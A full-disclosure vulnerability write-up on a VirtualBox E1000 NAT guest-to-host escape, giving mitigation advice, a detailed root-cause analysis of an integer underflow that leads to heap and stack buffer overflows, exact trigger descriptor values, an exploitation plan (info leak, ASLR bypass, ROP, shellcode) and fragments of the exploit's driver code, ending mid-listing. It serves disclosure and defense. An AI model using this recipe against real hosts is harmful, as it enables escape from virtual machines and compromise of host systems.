Full disclosure: VirtualBox 0day Escape Vulnerability

Published on November 07, 2018



I like VirtualBox, and that has nothing to do with why I am publishing this vulnerability. The reason is my disagreement with the current state of information security, more precisely, with how security research and bug bounty programs are run:


  1. It is considered normal to wait half a year for a vulnerability to be patched, as long as the bug is not publicly known.
  2. In bug bounty programs it is considered normal to:
    1. Take more than a month to verify a vulnerability and announce a decision on whether to buy it.
    2. Change the decision on whether the program buys bugs in a given piece of software on the fly. Today you are told that yes, they buy; a week later you come with bugs and exploits and are told that no, they do not.
    3. Not have a precise list of software for which bugs are bought. Convenient for bug bounty organizers, inconvenient for researchers.
    4. Not have clearly defined lower and upper price limits for vulnerabilities. Many factors affect the price, but researchers need to know what is worth their time and what is not.
  3. Delusions of grandeur and marketing nonsense: naming vulnerabilities and creating websites for them; holding a thousand conferences a year; exaggerating the importance of one's own work; considering yourself the "savior of the world". Come down to earth, Your Highness.

The first two points exhausted me completely, so my move was full disclosure.


General information


Vulnerable software: VirtualBox 5.2.20 and earlier.
Host OS: any, the bug is in a common code base.
Guest OS: any.
VM configuration: default (the only requirements are that the network card is Intel PRO/1000 MT Desktop (82540EM) and that it runs in NAT mode).


How to protect


Until a patched version of VirtualBox is released, switch the network card of your virtual machines to PCnet (either of the two) or to Paravirtualized Network. If that is not possible, change the mode of the Intel adapter from NAT to any other. The first option is more reliable.


Introduction


When a new virtual machine is created, its default network adapter is the Intel PRO/1000 MT Desktop (82540EM) configured in NAT mode. For brevity, we will call it the E1000.


The E1000 virtual device code contains a vulnerability that allows an attacker with root/administrator privileges in the guest OS to escape to the host OS and execute code in ring 3. The attacker can then use already well-known techniques to escalate privileges to ring 0 via the VirtualBox /dev/vboxdrv driver.


Vulnerability analysis


General information about the E1000


To send network packets, the guest does what a regular computer does: it configures the network adapter and hands it packets consisting of a data link layer frame and higher-level headers. Packets are not handed to the adapter directly but are wrapped in Tx descriptors (transmit descriptors). These data structures, described in the network card specification (317453006EN.PDF, Revision 4.0), store metadata such as the packet size and VLAN tag, control TCP/IP segmentation, and so on.


The 82540EM specification defines three types of Tx descriptors: legacy, context, and data. Legacy descriptors appear to be a thing of the past. The other two are used together. For us, the only important points are that context descriptors set the maximum packet size and enable or disable TCP/IP segmentation, while data descriptors hold the physical addresses of the packets and specify their sizes. The packet size in a data descriptor cannot exceed the maximum set in the context descriptor. Context descriptors are, as a rule, passed to the network card before data descriptors.


To hand Tx descriptors to the network adapter, the guest writes them to the Tx ring (transmit descriptor ring), a ring buffer located in physical memory at a predefined address. Once all the required descriptors are written to the ring, the guest updates the adapter's TDT (Transmit Descriptor Tail) MMIO register, which signals the host that there are new descriptors to process.
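
As a rough illustration of the ring-and-tail mechanism described above, here is a small user-space model in C. The names (tx_ring, ring_push, ring_pending, RING_SIZE) and the opaque 16-byte descriptor are assumptions made for this sketch; this is neither VirtualBox code nor the exploit's driver code.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define RING_SIZE 8u  /* hypothetical number of descriptor slots */

/* Opaque 16-byte descriptor; the real field layout is defined by the spec. */
struct tx_desc { uint8_t raw[16]; };

struct tx_ring {
    struct tx_desc slots[RING_SIZE];
    uint32_t head;  /* next slot the device will consume (TDH) */
    uint32_t tail;  /* next slot the driver will fill (TDT)    */
};

/* Number of descriptors written by the driver but not yet consumed. */
static uint32_t ring_pending(const struct tx_ring *r)
{
    return (r->tail + RING_SIZE - r->head) % RING_SIZE;
}

/* Driver side: copy a descriptor into the ring and advance the tail.
 * Returns 0 on success, -1 if the ring is full (one slot is kept free). */
static int ring_push(struct tx_ring *r, const struct tx_desc *d)
{
    assert(r != NULL && d != NULL);
    if (ring_pending(r) == RING_SIZE - 1)
        return -1;
    memcpy(&r->slots[r->tail], d, sizeof *d);
    r->tail = (r->tail + 1) % RING_SIZE;  /* on real hardware: an MMIO write to TDT */
    return 0;
}
```

In this model the tail update is an ordinary store; on the emulated adapter it is the MMIO write to TDT that makes the host start processing the new descriptors.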


Initial data


We have the following array of Tx-descriptors:


[context_1, data_2, data_3, context_4, data_5]

Suppose that they contain the following information (the names of the fields are specifically made human-readable, but they correspond to the descriptor fields from the 82540EM specification):


context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true
data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true
data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true
context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true
data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

We will soon see why the descriptors must be set up exactly like this to trigger the bug.


The essence of the vulnerability


Processing [context_1, data_2, data_3]


Suppose the guest wrote the above descriptors to the Tx ring in exactly this order and updated the TDT register. The VirtualBox process on the host will then run the e1kXmitPending function, located in src/VBox/Devices/Network/DevE1000.cpp (most comments have been removed here for readability):


static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

The e1kTxDLazyLoad function reads all 5 Tx descriptors from the Tx ring. Then e1kLocateTxPacket is called for the first time. This function walks through the descriptors and prepares the state for further work, but does not do most of the actual descriptor processing. In our case, the first call to e1kLocateTxPacket handles context_1, data_2, and data_3. The two remaining descriptors, context_4 and data_5, are handled on the next iteration of the while loop (we will look at the second iteration in the next section). This split of the descriptor array in two has important consequences, so let's see why it happens.


The e1kLocateTxPacket function looks like this:


static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

The first descriptor (context_1) is of type E1K_DTYP_CONTEXT, so e1kUpdateTxContext is called. This function updates the TCP segmentation context if segmentation was requested in the descriptor. That is the case for context_1 (see the previous section), so the TCP segmentation context is updated. (What exactly a "TCP segmentation context update" does is not important here; we use the term only to refer to this piece of code.)


The second descriptor (data_2) is of type E1K_DTYP_DATA; some actions are performed for it that are irrelevant to us.


The third descriptor (data_3) is also E1K_DTYP_DATA, but since data_3.data_length == 0 (pDesc->data.cmd.u20DTALEN in the code above), no action is taken.
At this point all three descriptors have been through initial processing, and two descriptors remain unprocessed. Now the trick: after the switch statement, the code checks whether the end_of_packet flag is set in the descriptor. It is set for data_3 (data_3.end_of_packet == true), so the code performs some actions and returns from the function:


        if (pDesc->legacy.cmd.fEOP)
        {
            ...
            return true;
        }

Had the data_3.end_of_packet flag not been set, the remaining two descriptors would also have gone through initial processing, and the vulnerability would not be triggered. Below you will see why returning from the function before all descriptors have been traversed leads to a bug.
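
To make the split concrete, here is a simplified C model of how a packet boundary is found. It keeps only the descriptor type and the end_of_packet flag; the names desc, packet_end and example_ring are invented for this sketch, and the logic is a reduction of the listings above, not the actual VirtualBox implementation.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

enum desc_type { DESC_CONTEXT, DESC_DATA };

struct desc {
    enum desc_type type;
    bool end_of_packet;   /* only meaningful for data descriptors here */
};

/* Return the index one past the last descriptor of the packet that starts
 * at `start`: scanning stops at the first non-context descriptor with
 * end_of_packet set. Returns `count` if no such descriptor is found. */
static size_t packet_end(const struct desc *d, size_t start, size_t count)
{
    assert(d != NULL && start <= count);
    for (size_t i = start; i < count; ++i) {
        if (d[i].type != DESC_CONTEXT && d[i].end_of_packet)
            return i + 1;
    }
    return count;
}

/* The five descriptors from the "Initial data" section. */
static const struct desc example_ring[5] = {
    { DESC_CONTEXT, false },  /* context_1 */
    { DESC_DATA,    false },  /* data_2    */
    { DESC_DATA,    true  },  /* data_3    */
    { DESC_CONTEXT, false },  /* context_4 */
    { DESC_DATA,    true  },  /* data_5    */
};
```

Calling packet_end(example_ring, 0, 5) stops after data_3, so context_4 is only looked at by the next call, after the first packet's data has already been handled.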


So, on return from e1kLocateTxPacket, the following descriptors are ready to have network packets extracted from them and sent to the network: context_1, data_2, data_3. Next, the inner while loop of e1kXmitPending calls e1kXmitPacket. This function iterates over the descriptors again (5 in our case) to process them for real:


static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

For each descriptor, the e1kXmitDesc function is called:


static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

The first descriptor that is passed to e1kXmitDesc is context_1. The function does nothing for context descriptors.


The second descriptor is data_2. Since we set tcp_segmentation_enabled == true for all data descriptors (pDesc->data.cmd.fTSE in the code above), e1kFallbackAddToFrame is called. This is the function where an integer variable will later wrap around while data_5 is processed.


static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;
    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }
        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));
    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }
    return VINF_SUCCESS;
}

The most important variables here are u16MaxPktLen, pThis->u16TxPktLen, and pDesc->data.cmd.u20DTALEN.


Let's draw a table showing the values of these variables before and after e1kFallbackAddToFrame is executed for the two data descriptors.


Tx descriptor   Before/After   u16MaxPktLen   pThis->u16TxPktLen   pDesc->data.cmd.u20DTALEN
data_2          Before         0x3010         0                    0x10
-               After          0x3010         0x10                 0
data_3          Before         0x3010         0x10                 0
-               After          0x3010         0x10                 0
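
The values in the table can be reproduced with a small C model of the fallback path. This is a sketch under stated assumptions: tx_state, data_desc and process_data_desc are hypothetical names, only the "fits completely" branch is modelled (the elided else-branch is reported as unsupported), and the queued length is assumed to grow inside the segment helper, which is what the table implies.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct tx_state {
    uint16_t max_pkt_len;  /* u16MaxPktLen: header length + MSS from the context */
    uint16_t tx_pkt_len;   /* pThis->u16TxPktLen: bytes already queued */
};

struct data_desc {
    uint32_t data_length;  /* u20DTALEN */
    bool     end_of_packet;
};

/* Simplified model of handling one data descriptor with segmentation on.
 * Returns 0 on success, -1 for the branch this sketch does not model. */
static int process_data_desc(struct tx_state *s, struct data_desc *d)
{
    assert(s != NULL && d != NULL);
    if (d->data_length == 0)
        return 0;                       /* empty descriptor: skipped entirely */
    uint32_t cb = (uint32_t)(s->max_pkt_len - s->tx_pkt_len);
    if (cb <= d->data_length)
        return -1;                      /* "does not fit" branch, not modelled */
    cb = d->data_length;
    /* Assumed: the segment helper advances the queued length by cb. */
    s->tx_pkt_len = (uint16_t)(s->tx_pkt_len + cb);
    d->data_length -= cb;
    if (d->end_of_packet)
        s->tx_pkt_len = 0;              /* packet finished: length is reset */
    return 0;
}
```

Because data_3 has a zero length it is skipped before the end-of-packet reset can run, which is why the queued length stays at 0x10 in this model.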

For us, the only thing that matters is that pThis->u16TxPktLen is still 0x10 once data_3 has been processed.
And now the key point. Take another look at the end of the e1kXmitPacket listing:


        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;

Since data_3 is not of type E1K_DTYP_CONTEXT and data_3.end_of_packet == true, we break out of the loop even though context_4 and data_5 still have to be handled. Again, just as with the initial processing, we stop before all descriptors have been dealt with. Why does this matter? To understand the vulnerability, you need to know that all context descriptors are meant to be processed before the data descriptors. Context descriptors are processed during the TCP segmentation context update in e1kLocateTxPacket. Data descriptors are processed later, in e1kXmitPacket. The developers did this to prevent u16MaxPktLen, which is controlled by context descriptors, from changing after some bytes of a network packet have already been processed. If context descriptors could be changed at any time, the subtraction in this line of e1kFallbackAddToFrame could wrap around:


uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;

But we can bypass this protection. Recall that back in e1kLocateTxPacket we forced the function to return early because data_3.end_of_packet == true. As a result, two descriptors (context_4 and data_5) are still waiting for initial and final processing even though some bytes have already been processed (pThis->u16TxPktLen is 0x10, not zero).


So we can change u16MaxPktLen arbitrarily via context_4.maximum_segment_size and make the subtraction wrap around.


Processing [context_4, data_5]


We have fully processed the first three descriptors and return to the beginning of the inner while loop of e1kXmitPending:


            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

Here e1kLocateTxPacket is called to perform the initial processing of context_4 and data_5. As mentioned earlier, we can set context_4.maximum_segment_size to an arbitrary value, including one smaller than the amount of data already processed. Recall our initial data:


context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true
data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

After running e1kLocateTxPacket, we have a maximum network packet size of 0xF, while the size of the already processed data is 0x10.


Finally, during the processing of data_5, the function e1kFallbackAddToFrame is called, where we have the following variable values:


Tx descriptor   Before/After   u16MaxPktLen   pThis->u16TxPktLen   pDesc->data.cmd.u20DTALEN
data_5          Before         0xF            0x10                 0x4188
-               After          -              -                    -

As a result, the subtraction wraps around (an integer underflow):


uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
=>
uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;
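
The arithmetic can be checked in isolation. In the C sketch below, bytes_left_unchecked mirrors the expression from e1kFallbackAddToFrame, while bytes_left_checked is a hypothetical guarded variant added purely for contrast; it is not the vendor's fix. Both function names are invented for this example.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors `uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;`.
 * Both uint16_t operands are promoted to int, so the difference can be
 * negative; converting it to uint32_t wraps modulo 2^32. */
static uint32_t bytes_left_unchecked(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    assert(sizeof(int) > sizeof(uint16_t));  /* the promotion to int is assumed */
    return (uint32_t)(max_pkt_len - tx_pkt_len);
}

/* Hypothetical guarded variant: report zero remaining bytes when more data
 * has already been queued than the current segment size allows. */
static uint32_t bytes_left_checked(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    if (tx_pkt_len >= max_pkt_len)
        return 0;
    return (uint32_t)(max_pkt_len - tx_pkt_len);
}
```

With the values from the table (0xF and 0x10) the unchecked version yields 0xFFFFFFFF, while the guarded one yields 0.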

This lets us pass the following check, because 0xFFFFFFFF > 0x4188:


        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }

Now e1kFallbackAddSegment is called with a size (cb) of 0x4188. Without the vulnerability it is impossible to call this function with a size greater than 0x4000, because the TCP segmentation context update checks that the maximum segment size is less than or equal to 0x4000:


DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }

Buffer overflow


How can we exploit our ability to call the e1kFallbackAddSegment function with an arbitrary size? I found at least two possibilities. First, the data that the guest sends is copied to the buffer on the heap:


static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

Here pThis->aTxPacketFallback is a buffer of size 0x3FA0 and u16Len is 0x4188: an obvious heap overflow that can be used, for instance, to overwrite function pointers, objects, or anything else nearby.
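
How far such a copy runs past the buffer is simple arithmetic. The helper below is a generic sketch (bytes_past_end and FALLBACK_BUF_SIZE are names made up here); it assumes, as the listing suggests, that the copy starts at offset pThis->u16TxPktLen inside the buffer.

```c
#include <assert.h>
#include <stddef.h>

#define FALLBACK_BUF_SIZE 0x3FA0u  /* size of aTxPacketFallback as stated in the text */

/* Number of bytes a copy of `len` bytes starting at `offset` would write
 * past the end of a buffer of `buf_size` bytes (0 if the copy fits). */
static size_t bytes_past_end(size_t buf_size, size_t offset, size_t len)
{
    assert(offset <= buf_size);
    size_t room = buf_size - offset;
    return len > room ? len - room : 0;
}
```

For the example descriptors (offset 0x10, length 0x4188) this gives 0x1F8 bytes beyond the end of the buffer; a different data_5 length would change how far the write reaches.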


Secondly, if we look deeper, we find that e1kFallbackAddSegment calls the e1kTransmitFrame function, which, with a certain configuration of the network adapter registers, calls e1kHandleRxPacket. This function allocates a buffer of size 0x4000 on the stack and copies data with the specified size into it without any checks, since they were performed earlier:


static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

As you can see, we have turned an integer underflow into a classic stack buffer overflow. Both overflows described above, the heap one and the stack one, are used in the exploit.


Exploit


The exploit is a Linux kernel module that is loaded into the guest OS. For Windows, a driver would be needed that differs only in the initialization wrapper and in kernel API calls.


Loading a driver requires elevated privileges on both operating systems. This is normal and is not considered an insurmountable obstacle. Look at the Pwn2Own competition, where researchers use exploit chains: a browser in the guest OS opens a malicious site, the attacker escapes the browser sandbox to gain full ring 3 access, then exploits an operating system vulnerability to reach ring 0, from where everything needed to attack the hypervisor from the guest OS is available.


Of course, the most powerful hypervisor vulnerabilities are those that can be exploited from guest ring 3. VirtualBox also has code that is reachable without guest root privileges, and it is still largely unstudied.


The exploit is 100% reliable. This means it either always works or never works, the latter because of mismatched binaries or some subtler reason I have not accounted for. It works on Ubuntu 16.04 and 18.04 x86_64 guests with the default configuration.


Exploitation algorithm


  1. The attacker unloads the e1000.ko kernel module, which is loaded by default in Linux guests, and loads the exploit's driver.
  2. The driver initializes the E1000 network adapter according to the specification. Only the transmit half is initialized, since the receive half is not used.
  3. Step 1: information leak.
    1. Loopback mode of the network adapter is disabled, so that the code containing the stack buffer overflow is unreachable.
    2. The main vulnerability is used to trigger the integer underflow, which leads to the heap buffer overflow but not to the stack buffer overflow.
    3. As a result of the heap buffer overflow, interacting with the network adapter's EEPROM allows any two bytes to be written at an offset of up to 128 kilobytes from a buffer on the heap. This gives the attacker a write primitive.
    4. Using the write primitive, eight bytes are written to the heap data structure of the Advanced Configuration and Power Interface (ACPI) device. A byte is written to a variable that ACPI uses as an index into a heap array from which one byte is read. Since the array is smaller than the largest value the byte can hold (255), the attacker can read past the array, which gives a read primitive.
    5. Using the read primitive, the attacker makes 8 requests to ACPI and obtains 8 bytes from the heap. These 8 bytes are a pointer into the VBoxDD.so shared library.
    6. The driver subtracts a constant from the pointer and obtains the base address of VBoxDD.so.
  4. Step 2: stack buffer overflow.
    1. Loopback mode of the network adapter is enabled, so that the code containing the stack buffer overflow becomes reachable.
    2. The main vulnerability is used to trigger the integer underflow, which now leads to both the heap buffer overflow and the stack buffer overflow. The return address saved on the stack (RIP/EIP) is overwritten, and the attacker gains control of execution.
    3. A chain of ROP gadgets is executed, which transfers control to the shellcode loader.
  5. Step 3: shellcode.
    1. The shellcode loader copies the main shellcode from the stack buffer to a location next to itself and transfers control to it.
    2. The shellcode calls fork and execve to spawn an arbitrary process on the host.
    3. The parent process performs the final steps needed for the virtual machine to keep running normally instead of crashing.
  6. The attacker unloads the driver and loads e1000.ko back so that the guest OS can keep using the network.
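
The last two sub-steps of the information leak (reading eight bytes and subtracting a constant) amount to the following. This is an illustrative C sketch: pointer_from_bytes and module_base are invented names, a little-endian x86_64 host is assumed, and the real offset constant depends on the exact VBoxDD.so build and is not given here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assemble a 64-bit little-endian pointer from eight bytes that were
 * read one at a time. */
static uint64_t pointer_from_bytes(const uint8_t bytes[8])
{
    assert(bytes != NULL);
    uint64_t value = 0;
    for (int i = 7; i >= 0; --i)
        value = (value << 8) | bytes[i];
    return value;
}

/* Module base = leaked pointer minus the pointer's known offset inside
 * the module. The offset is build-specific. */
static uint64_t module_base(uint64_t leaked_ptr, uint64_t offset_in_module)
{
    return leaked_ptr - offset_in_module;
}
```

For example, with made-up values, the bytes 78 56 34 12 00 7f 00 00 assemble to 0x00007f0012345678, and an offset of 0x345678 gives a base of 0x00007f0012000000.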

Initialization


The driver maps the region of physical memory that corresponds to the network card's MMIO into virtual memory. The physical address and size are set by the hypervisor.


void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;
    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }
    return va;
}

Next, the E1000 general-purpose registers are configured, memory for the Tx ring is allocated, and the transmit registers are configured.


void e1000_init(void* mmio) {
    // Configure general purpose registers
    configure_CTRL(mmio);
    // Configure TX registers
    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }
    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}
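
The configure_* helpers are not shown in this write-up. As a rough idea of what programming the transmit registers involves, here is a user-space C mock that writes to an in-memory stand-in for the MMIO window. Everything in it (fake_mmio, reg_write, reg_read, setup_tx_ring) is hypothetical, and the register offsets are taken from my reading of Intel's 8254x developer manual, so check them against the specification.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Transmit register offsets per Intel's 8254x manual (verify before use). */
enum {
    REG_TDBAL = 0x3800,  /* Tx descriptor base address, low 32 bits  */
    REG_TDBAH = 0x3804,  /* Tx descriptor base address, high 32 bits */
    REG_TDLEN = 0x3808,  /* Tx ring length in bytes                  */
    REG_TDH   = 0x3810,  /* Tx descriptor head                       */
    REG_TDT   = 0x3818   /* Tx descriptor tail                       */
};

#define MMIO_SIZE 0x20000u  /* same window size as in map_mmio above */

/* Stand-in for the mapped MMIO window so the sketch runs in user space. */
static uint32_t fake_mmio[MMIO_SIZE / sizeof(uint32_t)];

static void reg_write(uint32_t *mmio, uint32_t offset, uint32_t value)
{
    assert(mmio != NULL && offset % 4 == 0 && offset < MMIO_SIZE);
    mmio[offset / 4] = value;
}

static uint32_t reg_read(const uint32_t *mmio, uint32_t offset)
{
    assert(mmio != NULL && offset % 4 == 0 && offset < MMIO_SIZE);
    return mmio[offset / 4];
}

/* Program the ring location and size, then reset head and tail. */
static void setup_tx_ring(uint32_t *mmio, uint64_t ring_phys, uint32_t ring_bytes)
{
    reg_write(mmio, REG_TDBAL, (uint32_t)(ring_phys & 0xFFFFFFFFu));
    reg_write(mmio, REG_TDBAH, (uint32_t)(ring_phys >> 32));
    reg_write(mmio, REG_TDLEN, ring_bytes);
    reg_write(mmio, REG_TDH, 0);
    reg_write(mmio, REG_TDT, 0);
}
```

In a real kernel module the stores would go through the kernel's MMIO accessors on the ioremap'ed pointer instead of a plain array.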

ASLR bypass


Write primitive


From the very start of exploit development, I decided not to rely on primitives found in VirtualBox subsystems that are disabled by default. First of all, that means the Chromium service (not the browser), which is responsible for 3D acceleration and in which researchers have found more than 40 vulnerabilities over the past year. An information leak here means disclosing a value, usually a pointer into some shared library, from which the library's base address can be computed and ASLR bypassed.


So the problem was to find an information leak in components that run by default. The obvious thought was that, since our main vulnerability lets us overflow a heap buffer, we control everything located after that buffer. As we will see, no additional vulnerabilities were needed: the integer underflow turned out to be powerful enough to yield read and write primitives, an information leak, and a stack buffer overflow.


Let's see what exactly is overflowing on the heap.


/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

Here aTxPacketFallback is the 0x3FA0-byte buffer that is filled with the data read from the data descriptor. While looking for interesting fields located after this buffer, I came across the E1kEEPROM structure. It contains another structure with the following fields (src/VBox/Devices/Network/DevE1000.cpp):


/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

What do we gain by modifying them? The E1000 code implements the EEPROM, the adapter's non-volatile memory. The guest OS can access it through certain E1000 MMIO registers. The EEPROM is implemented as a finite state machine with several states and four operations. We are interested only in the "write to memory" operation. Here is what it looks like (src/VBox/Devices/Network/DevEEPROM.cpp):


EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}
void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

Here m_u16Addr, m_u16Word, and m_fWriteEnabled are fields of the EEPROM93C46 structure, all of which we control. We can therefore set them so that, when the following statement runs,


m_au16Data[u32Addr] = u16Value;

two bytes are written at an arbitrary 16-bit offset from the m_au16Data array, which resides in the same structure. We have found a write primitive.
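
The reach of this primitive follows from the index width. The C model below is only a sketch: heap_model, store_word and store_byte_offset are invented names, and the 64-word capacity of the real array is an assumption based on the 93C46 being a 1 Kbit part.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define EEPROM_WORDS  64u       /* assumed capacity of the 93C46 word array */
#define REACH_WORDS   0x10000u  /* everything a 16-bit index can address    */

/* Backing memory standing in for the heap: the first EEPROM_WORDS entries
 * play the role of m_au16Data, the rest is whatever follows it. */
static uint16_t heap_model[REACH_WORDS];

/* Same shape as storeWord: addr is never checked against EEPROM_WORDS. */
static void store_word(uint16_t *data, uint16_t addr, uint16_t value, int write_enabled)
{
    assert(data != NULL);
    if (write_enabled)
        data[addr] = value;
}

/* Byte offset from the start of the array touched by a store to addr. */
static size_t store_byte_offset(uint16_t addr)
{
    return (size_t)addr * sizeof(uint16_t);
}
```

The largest index, 0xFFFF, touches bytes 0x1FFFE and 0x1FFFF, so a store can land anywhere in the 128 kilobytes starting at the array.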


Read primitive


The next task was to find data structures on the heap worth overwriting, keeping in mind that the main goal is to leak a pointer into some module in order to obtain its base address. Fortunately, there was no need to resort to unreliable heap spraying: it turned out that the main data structures of the virtual devices are allocated from the internal hypervisor heap in such a way that the distance between these heap blocks is the same every time VirtualBox starts, even though their virtual addresses differ from run to run because of ASLR.


Specifically, when VirtualBox is launched, the PDM (Pluggable Device and Driver Manager) subsystem for each device creates a PDMDEVINS object, which is allocated from the hypervisor heap.


int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
